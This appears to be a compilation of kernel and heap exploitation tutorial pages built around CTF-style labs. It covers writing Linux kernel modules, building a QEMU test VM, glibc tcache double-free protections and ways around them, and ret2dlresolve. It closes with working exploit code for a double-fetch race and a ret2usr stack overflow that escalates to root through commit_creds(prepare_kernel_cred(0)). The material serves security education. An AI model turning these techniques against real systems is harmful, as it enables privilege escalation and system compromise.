The parameters to intro_read
may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read()
function itself:
We then use the function copy_to_user
to write QWERTY
to the buffer passed in as a parameter!
Simply use sudo insmod
to load it, .
Create a really basic exploit.c
:
If the module is successfully loaded, the read()
call should read QWERTY
into buffer
:
Success!
New and efficient heap management
Starting in , a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsortedbin.
The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd
pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.
Ironically, years of defenses that were implemented into the fastbins - such as the - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 binary is easier than one running under 2.25!
Resolving our own libc functions
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system
) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
Dynamically-linked ELF objects import libc
functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp
in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh
) once resolved.
There are 3 structures we need to fake.
The JMPREL
segment (.rel.plt
) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel
:
The column name
coresponds to our symbol name. The offset
is the GOT entry for our symbol. info
stores additional metadata.
Note the due to this the R_SYM
of gets
is 1
as 0x107 >> 8 = 1
.
Much simpler - just a table of strings for the names.
Symbol information is stores here in an Elf32_Sym
struct:
The most important value here is st_name
as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
We now know we can get the STRTAB
offset of the symbol's string using the R_SYM
value we got from the JMPREL
, combined with SYMTAB
:
Here we're reading SYMTAB + R_SYM * size (16)
, and it appears that the offset (the SYMTAB
st_name
variable) is 0x10
.
And if we read that offset on STRTAB
, we get the symbol's name!
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset
value and jump to the beginning of the .plt
section. A few instructions later, the dl-resolve()
function is called, with reloc_offset
being one of the arguments. It then uses this reloc_offset
to calculate the relocation and symtab entries.
Writing a Char Module is suprisingly simple. First, we specify what happens on init
(loading of the module) and exit
(unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()
) and unload (intro_exit()
). Note we put parameters as void
, this is because kernel modules are very picky about (even if just void).
We then register the purposes of the functions using module_init()
and module_exit()
.
Note that we use printk
rather than printf
. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT
is specifies the type of message sent, and .
Compiling a Kernel Object can seem a little more complex as we use a , but it's surprisingly simple:
$(MAKE)
is a special flag that effectively calls make
, but it propagate all same flags that our Makefile
was called with. So, for example, if we call
Then $(MAKE)
will become make -j 8
. Essentially, $(MAKE)
is make
, which compiles the module. The files produced are defined at the top as obj-m
. Note that compilation is unique per kernel, which is why the compiling process uses your unique kernel build section.
Now we've got a ko
file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg
.
Here we grab the last line using tail
- as you can see, our printk
is called!
Now let's unload the module:
And there our intro_exit
is called.
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry
struct, the :
It's a pointer to a tcache_perthread_struct
. In the function, we can see what key
is set to:
When a chunk is freed and tcache_put()
is called on it, the key
field is set to the location of the tcache_perthread_struct
. Why is this relevant? Let's check :
The chunk being freed is variable e
. We can see here that before tcache_put()
is called on it, there is a check being done:
The check determines whether the key
field of the chunk e
is set to the address of the tcache_perthread_struct
already. Remember that this happens when it is put into the tcache with tcache_put()
! If the pointer is already there, there is a very high chance that it's because the chunk has already been freed, in which case it's a double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
There is a 1/2^<size_t>
chance that the key
being tcache_perthread_struct
already is a coincidence. To verify, it simply iterates through the tcache bin and compares the chunks to the one being freed:
Iterates through each entry, calls it tmp
and compares it to e
. If equal, it detected a double-free.
You can think of the key
as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it stops a simple double-free, but if we have any kind of UAF primitive we can easily overwrite e->key
. Even with a single byte, we still have a 255/256 chance of overwriting it to something that doesn't match key
. Creating fake tcache chunks doesn't matter either, as even in the latest glibc version there is , meaning tcache poisoning is still doable.
In fact, the key
can even be helpful for us - the fd
pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key
field is not mangled, so if we can leak the location of tcache_perthread_struct
instead, this gives us a heap leak as it is always located at heap_base + 0x10
.
In glibc 2.34, the key
field was . Instead of tcache_put()
setting key
to the location of the tcache_perthread_struct
, it sets it to :
What is tcache_key
? It's defined and set directly below, in the function:
It attempts to call __getrandom()
, which is defined as a stub and for Linux ; it just uses a syscall to read n
random bytes. If that fails for some reason, it calls the function instead, which generates a pseudo-random number seeded by the time. Long story short: tcache_key
is random. The , and the operation is the same, just it's completely random rather than based on ASLR. As the comment above it says
The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]
This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key
, however.
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops); // explained later
if ( major < 0 )
printk(KERN_ALERT "[Intro] Error assigning Major Number!");
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
major = register_chrdev(0, DEVICE_NAME, &fops);
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
printk(KERN_ALERT "reading...");
copy_to_user(buffer, "QWERTY", 6);
return 0;
}
static struct file_operations fops = {
.read = intro_read
};
ssize_t read(int fd, void *buf, size_t count);
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/uaccess.h>
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
MODULE_AUTHOR("ir0nstone");
MODULE_DESCRIPTION("Interactive Drivers");
MODULE_LICENSE("GPL");
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
printk(KERN_ALERT "reading...");
copy_to_user(buffer, "QWERTY", 6);
return 0;
}
static struct file_operations fops = {
.read = intro_read
};
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops);
if ( major < 0 )
printk(KERN_ALERT "[Intro] Error assigning Major Number!");
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
module_init(intro_init);
module_exit(intro_exit);
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
int main() {
int fd = open("/dev/intro", O_RDWR); // Open the device with RW access
printf("FD: %d\n", fd); // print the file descriptor
char buffer[6];
memset(&buffer, 'A', 6); // fill with As
printf("%s\n", buffer); // print
read(fd, buffer, 6); // read from module
printf("%s\n", buffer); // print again
}
$ ./exploit
FD: 3
AAAAAA
QWERTY
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Mine!");
static int intro_init(void) {
printk(KERN_ALERT "Custom Module Started!\n");
return 0;
}
static void intro_exit(void) {
printk(KERN_ALERT "Custom Module Stopped :(\n");
}
module_init(intro_init);
module_exit(intro_exit);
obj-m += intro.o
all:
$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
$ make -j 8
$ sudo insmod test.ko
$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!
$ sudo rmmod test
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
if (__glibc_unlikely (e->key == tcache))
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
static void tcache_key_initialize (void)
{
if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)
!= sizeof (tcache_key))
{
tcache_key = random_bits ();
#if __WORDSIZE == 64
tcache_key = (tcache_key << 32) | random_bits ();
#endif
}
}
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected");
if (__glibc_unlikely (misaligned_chunk (victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}
if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");
if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("<funcname>(): "
"unaligned fastbin chunk detected")
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("tcache_thread_shutdown(): "
"unaligned tcache chunk detected");
#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
A more useful way to interact with the driver
Linux contains a syscall called ioctl
, which is often used to communicate with a driver. ioctl()
takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
static ssize_t ioctl_handler(struct file *file, unsigned int cmd, unsigned long arg) {
printk("Command: %d; Argument: %d", cmd, arg);
return 0;
}
But if you want, you can interpret cmd
and arg
as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl()
function, which you can import in C:
#include <sys/ioctl.h>
// [...]
ioctl(fd, 0x100, 0x12345678); // data is a string
And you would have to update the file_operations
struct:
static struct file_operations fops = {
.ioctl = ioctl_handler
};
On modern Linux kernel versions, .ioctl
has been removed and replaced by .unlocked_ioctl
and .compat_ioctl
. The former is the replacement for .ioctl
, with the latter allowing 32-bit processes to perform ioctl
calls on 64-bit systems. As a result, the new file_operations
is likely to look more like this:
static struct file_operations fops = {
.compat_ioctl = ioctl_handler,
.unlocked_ioctl = ioctl_handler
};
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
$ apt-get install flex bison libelf-dev
git clone https://github.com/torvalds/linux --depth=1
Use --depth 1
to only get the last commit.
Remove the current compilation configurations, as they are quite complex for our needs
$ cd linux
$ rm -f .config
Now we can create a minimal configuration, with almost all options disabled. A .config
file is generated with the least features and drivers possible.
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
We create a kconfig
file with the options we want to enable. An example is the following:
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
In order to update the minimal .config
with these options, we use the provided merge_config.sh
script:
$ scripts/kconfig/merge_config.sh .config ../kconfig
$ make -j4
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage
. This is the same bzImage
that you get in CTF challenges.
When we compile kernel modules for our own kernel, we use the following Makefile
structure:
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
To compile it for a different kernel, all we do is change the -C
flag to point to the newly-compiled kernel rather than the system's:
all:
make -C /home/ir0nstone/linux M=$(PWD) modules
The module is now compiled for the specific kernel version!
We now have a minimal kernel bzImage
and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox
, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox
; you can find the latest version here.
$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -
We also create an output folder for compiled versions.
$ mkdir busybox_compiled
Now compile it statically. We're going to use the menuconfig
option, so we can make some choices.
$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig
Once the menu loads, hit Enter
on Settings
. Hit the down arrow key until you reach the option Build static binary (no shared libs)
. Hit Space
to select it, and then Escape
twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
$ cd ../busybox_compiled
$ make -j
$ make install
Now we make the file system.
$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/
The last thing missing is the classic init
script, which gets run on system load. A provisional one works fine for now:
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
exec /bin/sh
Make it executable
$ chmod +x init
Finally, we're going to bundle it into a cpio
archive, which is understood by QEMU.
find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio
The -not -name *.cpio
is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz
file, which QEMU also recognises
If we want to extract the cpio
archive (say, during a CTF) we can use this command:
$ cpio -i -F initramfs.cpio
Put bzImage
and initramfs.cpio
into the same folder. Write a short run.sh
script that loads QEMU:
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd initramfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic" \
-monitor /dev/null \
-nographic \
-no-reboot
Once we make this executable and run it, we get loaded into a VM!
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
~ # whoami
whoami: unknown uid 0
This is because /etc/passwd
and /etc/group
don't exist, so we can just create those!
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh
root:x:0:
user:x:1000:
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko
file to the filesystem root. Then we modify the init
script to load it, and also set the UID of the loaded shell to 1000
(so we are not root!).
#!/bin/sh
insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch
mount -t proc none /proc
mount -t sysfs none /sys
mknod -m 666 /dev/ttyS0 c 4 64
setsid /bin/cttyhack setuidgid 1000 /bin/sh
Here I am assuming that the major number of the double_fetch
module is 253
.
Why am I doing that?
If we load into a shell and run cat /proc/devices
, we can see that double_fetch
is loaded with major number 253
every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
$ git fetch --tags
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
$ git checkout v5.11
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules are written in C and compiled to a .ko
(Kernel Object) format. Most kernel modules are compiled for a specific version kernel version (which can be checked with uname -r
, my Xenial Xerus is 4.15.0-128-generic
). We can load and unload these modules using the insmod
and rmmod
commands respectively. Kernel modules are often loaded into /dev/*
or /proc/
. There are 3 main module types: Char, Block and Network.
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open
. In this way, they're virtually almost dynamic files (at a super basic level), as the values read and written can be changed.
Examples of Char modules include /dev/random
.
Removing the artificial sleep
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0
to the ID, and another that writes another value - e.g. 900
- and then calling write
. The aim is for the thread that switches to 0
to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".
If we check the source, we can see that there is no msleep
any longer:
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
printk("[Double-Fetch] Attempting login...");
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
Our exploit is going to look slightly different! We'll create the Credentials
struct again and set the ID to 900
:
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
// now we write the cred struct to the module
res_id = write(fd, &creds, 0);
// if res_id is 0, stop the race
if (!res_id) {
puts("[+] ID is 0!");
break;
}
}
If the ID returned is 0
, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900
and 0
. We do this in the hope that it will be 900
on the first dereference, and 0
on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()
! Otherwise your main thread will wait forever for the second to stop!).
void *switcher(void *arg) {
volatile Credentials *creds = (volatile Credentials *)arg;
while (1) {
creds->id = 0;
creds->id = 900;
}
}
Compile the exploit and run it, we get the desired result:
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
Look how quick that was! Insane - two fails, then a success!
You might be wondering how tight the race window can be for exploitation - well, gnote
from TokyoWesterns CTF 2019 had a race of two assembly instructions:
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
The dereferences [rbx]
have just one assembly instruction between, yet we are capable of racing. THAT is just how tight!
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
#define PASSWORD "p4ssw0rd"
#define FLAG "flag{YES!}"
#define FAIL "FAIL: Not Authenticated!"
static int authenticated = 0;
static ssize_t auth_read(struct file *filp, char __user *buf, size_t len, loff_t *off) {
printk(KERN_ALERT "[Auth] Attempting to read flag...");
if (authenticated) {
copy_to_user(buf, FLAG, sizeof(FLAG)); // ignoring `len` here
return 1;
}
copy_to_user(buf, FAIL, sizeof(FAIL));
return 0;
}
static ssize_t auth_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
char password_attempt[20];
printk(KERN_ALERT "[Auth] Reading password from user...");
copy_from_user(password_attempt, buf, count);
if (!strcmp(password_attempt, PASSWORD)) {
printk(KERN_ALERT "[Auth] Password correct!");
authenticated = 1;
return 1;
}
printk(KERN_ALERT "[Auth] Password incorrect!");
return 0;
}
If we attempt to read()
from the device, it checks the authenticated
flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!
.
In order to update authenticated
, we have to write()
to the kernel module. What we attempt to write it compared to p4ssw0rd
. If it's not equal, nothing happens. If it is, authenticated
is updated and the next time we read()
it'll return the flag!
Let's first try and interact with the kernel by reading from it.
We'll start by opening the device and reading from it.
int fd = open("/dev/authentication", O_RDWR);
char buffer[20];
read(fd, buffer, 20);
printf("%s\n", buffer);
After compiling, we get that we are not authenticated:
$ ./exploit
FAIL: Not Authenticated!
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user()
does not automatically add it, so the strcmp
will fail otherwise!
write(fd, "p4ssw0rd\0", 9);
read(fd, buffer, 20);
printf("%s\n", buffer);
It works!
$ ./exploit
FAIL: Not Authenticated!
flag{YES!}
Amazing! Now for something really important:
$ ./exploit
flag{YES!}
flag{YES!}
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod
then insmod
, or a system restart).
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
int main() {
int fd = open("/dev/authentication", O_RDWR);
char buffer[20];
read(fd, buffer, 1);
printf("%s\n", buffer);
write(fd, "p4ssw0rd", 8);
read(fd, buffer, 20);
printf("%s\n", buffer);
}
So, here's your challenge! Write the same kernel module, but using ioctl
instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practise.
Supervisor Memory Execute Protection
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the kernel by controlling the respective QEMU flag (qemu64
is not notable):
-cpu qemu64,+smep
ROPpety boppety, but now in the kernel
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0))
, and overwrite the return pointer to point there.
The relevant code is here:
static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
char buffer[0x20];
printk(KERN_INFO "Testing...");
memcpy(buffer, buf, 0x100);
printk(KERN_INFO "Yes? %s", buffer);
return 0;
}
As we can see, it's a size 0x100
memcpy
into an 0x20
buffer. Not the hardest thing in the world to spot. The second printk
call here is so that buffer
is used somewhere, otherwise it's just optimised out by make
and the entire function just becomes xor eax, eax; ret
!
Firstly, we want to find the location of prepare_kernel_cred()
and commit_creds()
. We can do this by reading /proc/kallsyms
, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
~ # cat /proc/kallsyms | grep cred
[...]
ffffffff81066e00 T commit_creds
ffffffff81066fa0 T prepare_kernel_cred
[...]
Now we know the locations of the two important functions: After that, the assembly is pretty simple. First we call prepare_kernel_cred(0)
:
xor rdi, rdi
mov rcx, 0xffffffff81066fa0
call rcx
Then we call commit_creds()
on the result (which is stored in RAX):
mov rdi, rax
mov rcx, 0xffffffff81066e00
call rcx
We can throw this directly into the C code using inline assembly:
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
);
}
The next step is overflowing. The 7th qword
overwrites RIP:
// overflow
uint64_t payload[7];
payload[6] = (uint64_t) escalate;
write(fd, payload, 0);
Finally, we create a get_shell()
function we call at the end, once we've escalated privileges:
void get_shell() {
system("/bin/sh");
}
int main() {
// [ everything else ]
get_shell();
}
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds()
, it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state from the start of the program execution, then once we have escalate privileges in kernel mode, we restore the registers to swap to user mode. This reverts execution to the exact state it was before we ever entered kernel mode!
We can store them as follows:
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags
void save_state() {
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate()
for after the privileges are acquired:
uint64_t user_rip = (uint64_t) get_shell;
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
